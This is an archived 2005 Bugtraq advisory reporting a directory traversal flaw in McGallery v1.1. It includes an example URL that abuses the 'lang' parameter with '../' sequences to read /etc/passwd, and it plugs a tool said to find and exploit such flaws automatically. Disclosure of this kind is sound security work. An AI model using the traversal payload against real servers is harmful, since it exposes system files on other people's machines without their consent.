Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Vulnerability: McGallery v 1.1 files reading on disk

From: D_BuG <d_bug () bk ru>
Date: Wed, 15 Jun 2005 17:58:23 +0400
Vendor: Phpforum, http://www.phpforums.net/
Product: McGallery v 1.1

Vulnerability: files reading on disk
Consequences: Web server paths are opened 
Risk: High

Description: Attacker can form the query in URL form ang get the access to the system files
Example: thttp://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd

Discoveried By D_BuG d_bug () bk ru
NemesisSecurityTeam
http://nemesisoftware.com/

CheckZond free v. 1.0 http://nemesisoftware.com/products.htm
uses the vulnerabilities above for automatic vulnerabilities search (Google Hacking technique) and usage.

-- 
Best regards,
 D_BuG                          mailto:d_bug () bk ru
Previous By Date Next
Previous By Thread Next

Current thread: